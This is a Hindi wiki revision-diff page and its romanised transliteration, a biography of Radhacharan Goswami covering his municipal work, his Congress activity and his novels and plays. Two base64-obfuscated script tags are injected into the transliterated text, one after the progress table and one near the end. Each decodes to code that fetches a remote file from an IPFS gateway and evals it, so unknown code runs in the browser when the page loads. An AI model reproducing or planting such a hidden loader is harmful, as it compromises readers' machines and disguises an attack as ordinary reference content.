Difference between revisions of "राधाचरण गोस्वामी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''राधाचरण गोस्वामी''' (जन्म- [[25 फरवरी]], [[1859]], मृत्यु- [[दिसंबर]], [[1925]]) [[ब्रज]] के निवासी एक [[साहित्यकार]], नाटककार और [[संस्कृत]] के उच्च कोटि के विद्वान थे। आपने [[ब्रज भाषा]] का समर्थन किया। राधाचरण गोस्वामी [[खड़ी बोली]] के पद्य के विरोधी थे। आपको यह आशंका थी कि खड़ी बोली के बहाने [[उर्दू]] का प्रचार हो जाएगा।  
+
'''राधाचरण गोस्वामी''' (जन्म- [[25 फरवरी]], [[1859]], मृत्यु- [[12 दिसंबर]], [[1925]]) [[ब्रज]] के निवासी एक [[साहित्यकार]], नाटककार और [[संस्कृत]] के उच्च कोटि के विद्वान थे। आपने [[ब्रज भाषा]] का समर्थन किया। राधाचरण गोस्वामी [[खड़ी बोली]] पद्य के विरोधी थे। उनको यह आशंका थी कि खड़ी बोली के बहाने [[उर्दू]] का प्रचार हो जाएगा।
 
==परिचय==
 
==परिचय==
राधाचरण गोस्वामी [[भारतेंदु युग]] के साहित्यकार, नाटककार के होने के साथ-साथ संस्कृत भाषा के उच्च कोटि के विद्वान थे। आपने सदा सामाजिक बुराईयों का कड़ा विरोध किया और इस कारण आप [[ब्रह्म समाज]] की ओर भी आकृष्ट हुए थे।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=719|url=}}</ref>
+
राधाचरण गोस्वामी का जन्म 25 फ़रवरी, 1859 को हुआ था। उनके [[पिता]] गल्लू जी महाराज अर्थात् गुणमंजरी दास जी (1827- [[1890]] ई.) एक भक्त [[कवि]] थे। उनमें किसी प्रकार की धार्मिक कट्टरता और रूढ़िवादिता नहीं थी, प्रगतिशीलता और सामाजिक क्रान्ति की प्रज्ज्वलित चिनगारियाँ थीं। उनमें राष्ट्रवादी राजनीति की प्रखर चेतना थी। [[भारत]] की तत्कालीन राजनीतिक और राष्ट्रीय चेतना की नब्ज पर उनकी उँगली थी और नवजागरण की मुख्य धारा में राधाचरण गोस्वामी जी की सक्रिय एवं प्रमुख भूमिका थी। उन्होंने [[1883]] में पश्चिमोत्तर और [[अवध]] में आत्मशासन की माँग की थी। मासिक पत्र ‘भारतेन्दु’ में उन्होंने ‘पश्चिमोत्तर और अवध में आत्मशासन’ शीर्षक से सम्पादकीय अग्रलेख लिखा था। 19वीं शताब्दी के उत्तरार्द्ध में [[बनारस]], [[इलाहाबाद]], [[पटना]], [[कलकत्ता]] और [[वृन्दावन]] नवजागरण के पाँच प्रमुख केन्द्र थे। वृन्दावन केन्द्र के एकमात्र सार्वकालिक प्रतिनिधि राधाचरण गोस्वामी ही थे।
==योगदान==
+
==नगरपालिका सदस्य==
गोस्वामी जी ने मौलिक नाटकों की रचना की और [[बांग्ला भाषा]] की अनेक पुस्तकों का [[हिंदी]] में अनुवाद किया। उनकी महत्त्वपूर्ण रचनाएं इस प्रकार हैं:
+
पण्डित राधाचरण गोस्वामी [[1885]] में वृन्दावन नगरपालिका के सदस्य पहली बार निर्वाचित हुए थे। [[10 मार्च]], [[1897]] को वे तीसरी बार नगरपालिका के सदस्य निर्वाचित हुए थे। नगरपालिका के माध्यम से वृन्दावन की कुंज गलियों में छः पक्की सड़कों का निर्माण उन्होंने कराया था।
 +
==क्रान्तिकारियों के प्रति आस्था==
 +
[[लाला लाजपत राय|पंजाब केसरी लाला लाजपत राय]] का आगमन दो बार वृन्दावन में हुआ था। दोनों बार गोस्वामी जी ने उनका शानदार स्वागत किया था। ब्रजमाधव गौड़ीय सम्प्रदाय के श्रेष्ठ आचार्य होने के बावजूद उनकी बग्घी के घोड़ों के स्थान पर स्वयं उनकी बग्घी खींचकर उन्होंने [[भारत]] के राष्ट्रनेताओं के प्रति अपनी उदात्त भावना का सार्वजनिक परिचय दिया था। तत्कालीन महान क्रान्तिकारियों में उनके प्रति आस्था और विश्वास था और उनसे उनके हार्दिक सम्बन्ध भी थे। [[22 नवम्बर]], [[1911]] को महान क्रान्तिकारी [[रासबिहारी बोस]] और योगेश चक्रवर्ती उनसे मिलने उनके घर पर आए थे और उनका प्रेमपूर्ण स्वागत उन्होंने किया था। उक्त अवसर पर गोस्वामी जी की दोनों आँखें प्रेम के भावावेश के कारण अश्रुपूर्ण हो गई थीं।
 +
====कांग्रेस कार्यकर्ता====
 +
गोस्वामी जी कांग्रेस के आजीवन सदस्य और प्रमुख कार्यकर्ता थे। [[1888]] से [[1894]] तक वे [[मथुरा]] की कांग्रेस समिति के सचिव रहे थे।
 +
==साहित्यिक योगदान==
 +
गोस्वामी राधाचरण के साहित्यिक जीवन का उल्लेखनीय आरम्भ [[1877]] में हुआ था। इस वर्ष उनकी पुस्तक ‘शिक्षामृत’ का प्रकाशन हुआ था। यह उनकी प्रथम पुस्तकाकार रचना है। तत्पश्चात् मौलिक और अनूदित सब मिलाकर पचहत्तर पुस्तकों की रचना उन्होंने की। इनके अतिरिक्त उनकी प्रायः तीन सौ से ज्यादा विभिन्न कोटियों की रचनाएँ तत्कालीन पत्र-पत्रिकाओं में फैली हुई हैं, जिनका संकलन अब तक नहीं किया जा सका है। उनकी साहित्यिक उपलब्धियों की अनेक दिशाएँ हैं। वे [[कवि]] थे, किन्तु हिन्दी गद्य की विभिन्न विधाओं की श्रीवृद्धि भी उन्होंने की। उन्होंने [[राधा]]-[[कृष्ण]] की लीलाओं, प्रकृति-सौन्दर्य और ब्रज की संस्कृति के विभिन्न पक्षों पर काव्य-रचना की। [[कविता]] में उनका उपनाम ‘मंजु’ था।
 +
====कृतियाँ====
 +
गोस्वामी जी ने मौलिक [[नाटक|नाटकों]] की रचना की और [[बांग्ला भाषा]] की अनेक पुस्तकों का [[हिंदी]] में अनुवाद किया। उनकी महत्त्वपूर्ण रचनाएं इस प्रकार हैं-
 
#'सती चंद्रावती'  
 
#'सती चंद्रावती'  
 
#'अमर सिंह राठौर'  
 
#'अमर सिंह राठौर'  
 
#'सुदामा'  
 
#'सुदामा'  
 
#'तन मन धन श्री गोसाई जी को अर्पण'
 
#'तन मन धन श्री गोसाई जी को अर्पण'
==समर्थक एवं विरोधी==
+
 
आपने सदा ब्रज भाषा का समर्थन किया और खड़ी बोली के पद्य के विरोधी थे। आपको यह डर था कि कहीं खड़ी बोली के बहाने उर्दू का प्रचार न हो जाये। उस समय इस विषय को लेकर साहित्य क्षेत्र में बढ़ा विवाद चला था।
+
राधाचरण जी ने समस्या प्रधान मौलिक [[उपन्यास]] लिखे। ‘बाल विधवा’ (1883-84 ई.), ‘सर्वनाश’ (1883-84 ई.), ‘अलकचन्द’ (अपूर्ण 1884-85 ई.) ‘विधवा विपत्ति’ (1888 ई.) ‘जावित्र’ (1888 ई.) आदि। वे [[हिन्दी]] में प्रथम समस्यामूलक उपन्यासकार थे, [[प्रेमचन्द]] नहीं। ‘वीरबाला’ उनका ऐतिहासिक उपन्यास है। इसकी रचना 1883-84 ई. में उन्होंने की थी। हिन्दी में ऐतिहासिक उपन्यास का आरम्भ उन्होंने ही किया। ऐतिहासिक उपन्यास ‘दीप निर्वाण’ (1878-80 ई.) और सामाजिक उपन्यास ‘विरजा’ (1878 ई.) उनके द्वारा अनूदित उपन्यास है। लघु उपन्यासों को वे ‘नवन्यास’ कहते थे। ‘कल्पलता’ (1884-85 ई.) और ‘सौदामिनी’ (1890-91 ई.) उनके मौलिक सामाजिक नवन्यास हैं। प्रेमचन्द के पूर्व ही गोस्वामी जी ने समस्यामूलक उपन्यास लिखकर हिन्दी में नई धारा का प्रवर्त्तन किया था।  
 
==मृत्यु==
 
==मृत्यु==
[[दिसंबर]] [[1925]] में राधाचरण गोस्वामी जी का निधन हो गया।
+
[[दिसंबर]] [[1925]] में राधाचरण गोस्वामी जी का निधन हो गया। राधाचरण जी [[भारतेंदु युग]] के [[साहित्यकार]], नाटककार के होने के साथ-साथ [[संस्कृत भाषा]] के उच्च कोटि के विद्वान थे। आपने सदा सामाजिक बुराईयों का कड़ा विरोध किया और इस कारण आप [[ब्रह्म समाज]] की ओर भी आकृष्ट हुए थे।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=719|url=}}</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{साहित्यकार}}{{नाटककार}}
 
{{साहित्यकार}}{{नाटककार}}

Revision as of 12:06, 8 September 2018

radhacharan gosvami (janm- 25 pharavari, 1859, mrityu- 12 disanbar, 1925) braj ke nivasi ek sahityakar, natakakar aur sanskrit ke uchch koti ke vidvan the. apane braj bhasha ka samarthan kiya. radhacharan gosvami kh di boli pady ke virodhi the. unako yah ashanka thi ki kh di boli ke bahane urdoo ka prachar ho jaega.

parichay

radhacharan gosvami ka janm 25 faravari, 1859 ko hua tha. unake pita galloo ji maharaj arthath gunamanjari das ji (1827- 1890 ee.) ek bhakt kavi the. unamean kisi prakar ki dharmik kattarata aur roodhivadita nahian thi, pragatishilata aur samajik kranti ki prajjvalit chinagariyaan thian. unamean rashtravadi rajaniti ki prakhar chetana thi. bharat ki tatkalin rajanitik aur rashtriy chetana ki nabj par unaki uangali thi aur navajagaran ki mukhy dhara mean radhacharan gosvami ji ki sakriy evan pramukh bhoomika thi. unhoanne 1883 mean pashchimottar aur avadh mean atmashasan ki maang ki thi. masik patr ‘bharatendu’ mean unhoanne ‘pashchimottar aur avadh mean atmashasan’ shirshak se sampadakiy agralekh likha tha. 19vian shatabdi ke uttararddh mean banaras, ilahabad, patana, kalakatta aur vrindavan navajagaran ke paanch pramukh kendr the. vrindavan kendr ke ekamatr sarvakalik pratinidhi radhacharan gosvami hi the.

nagarapalika sadasy

pandit radhacharan gosvami 1885 mean vrindavan nagarapalika ke sadasy pahali bar nirvachit hue the. 10 march, 1897 ko ve tisari bar nagarapalika ke sadasy nirvachit hue the. nagarapalika ke madhyam se vrindavan ki kuanj galiyoan mean chhah pakki s dakoan ka nirman unhoanne karaya tha.

krantikariyoan ke prati astha

panjab kesari lala lajapat ray ka agaman do bar vrindavan mean hua tha. donoan bar gosvami ji ne unaka shanadar svagat kiya tha. brajamadhav gau diy sampraday ke shreshth achary hone ke bavajood unaki bagghi ke gho doan ke sthan par svayan unaki bagghi khianchakar unhoanne bharat ke rashtranetaoan ke prati apani udatt bhavana ka sarvajanik parichay diya tha. tatkalin mahan krantikariyoan mean unake prati astha aur vishvas tha aur unase unake hardik sambandh bhi the. 22 navambar, 1911 ko mahan krantikari rasabihari bos aur yogesh chakravarti unase milane unake ghar par ae the aur unaka premapoorn svagat unhoanne kiya tha. ukt avasar par gosvami ji ki donoan aankhean prem ke bhavavesh ke karan ashrupoorn ho gee thian.

kaangres karyakarta

gosvami ji kaangres ke ajivan sadasy aur pramukh karyakarta the. 1888 se 1894 tak ve mathura ki kaangres samiti ke sachiv rahe the.

sahityik yogadan

gosvami radhacharan ke sahityik jivan ka ullekhaniy arambh 1877 mean hua tha. is varsh unaki pustak ‘shikshamrit’ ka prakashan hua tha. yah unaki pratham pustakakar rachana hai. tatpashchath maulik aur anoodit sab milakar pachahattar pustakoan ki rachana unhoanne ki. inake atirikt unaki prayah tin sau se jyada vibhinn kotiyoan ki rachanaean tatkalin patr-patrikaoan mean phaili huee haian, jinaka sankalan ab tak nahian kiya ja saka hai. unaki sahityik upalabdhiyoan ki anek dishaean haian. ve kavi the, kintu hindi gady ki vibhinn vidhaoan ki shrivriddhi bhi unhoanne ki. unhoanne radha-krishna ki lilaoan, prakriti-saundary aur braj ki sanskriti ke vibhinn pakshoan par kavy-rachana ki. kavita mean unaka upanam ‘manju’ tha.

kritiyaan

gosvami ji ne maulik natakoan ki rachana ki aur baangla bhasha ki anek pustakoan ka hiandi mean anuvad kiya. unaki mahattvapoorn rachanaean is prakar haian-

  1. 'sati chandravati'
  2. 'amar sianh rathaur'
  3. 'sudama'
  4. 'tan man dhan shri gosaee ji ko arpan'

radhacharan ji ne samasya pradhan maulik upanyas likhe. ‘bal vidhava’ (1883-84 ee.), ‘sarvanash’ (1883-84 ee.), ‘alakachand’ (apoorn 1884-85 ee.) ‘vidhava vipatti’ (1888 ee.) ‘javitr’ (1888 ee.) adi. ve hindi mean pratham samasyamoolak upanyasakar the, premachand nahian. ‘virabala’ unaka aitihasik upanyas hai. isaki rachana 1883-84 ee. mean unhoanne ki thi. hindi mean aitihasik upanyas ka arambh unhoanne hi kiya. aitihasik upanyas ‘dip nirvan’ (1878-80 ee.) aur samajik upanyas ‘viraja’ (1878 ee.) unake dvara anoodit upanyas hai. laghu upanyasoan ko ve ‘navanyas’ kahate the. ‘kalpalata’ (1884-85 ee.) aur ‘saudamini’ (1890-91 ee.) unake maulik samajik navanyas haian. premachand ke poorv hi gosvami ji ne samasyamoolak upanyas likhakar hindi mean nee dhara ka pravarttan kiya tha.

mrityu

disanbar 1925 mean radhacharan gosvami ji ka nidhan ho gaya. radhacharan ji bharateandu yug ke sahityakar, natakakar ke hone ke sath-sath sanskrit bhasha ke uchch koti ke vidvan the. apane sada samajik buraeeyoan ka k da virodh kiya aur is karan ap brahm samaj ki or bhi akrisht hue the.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. bharatiy charit kosh |lekhak: liladhar sharma 'parvatiy' |prakashak: shiksha bharati, madarasa rod, kashmiri get, dilli |prishth sankhya: 719 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>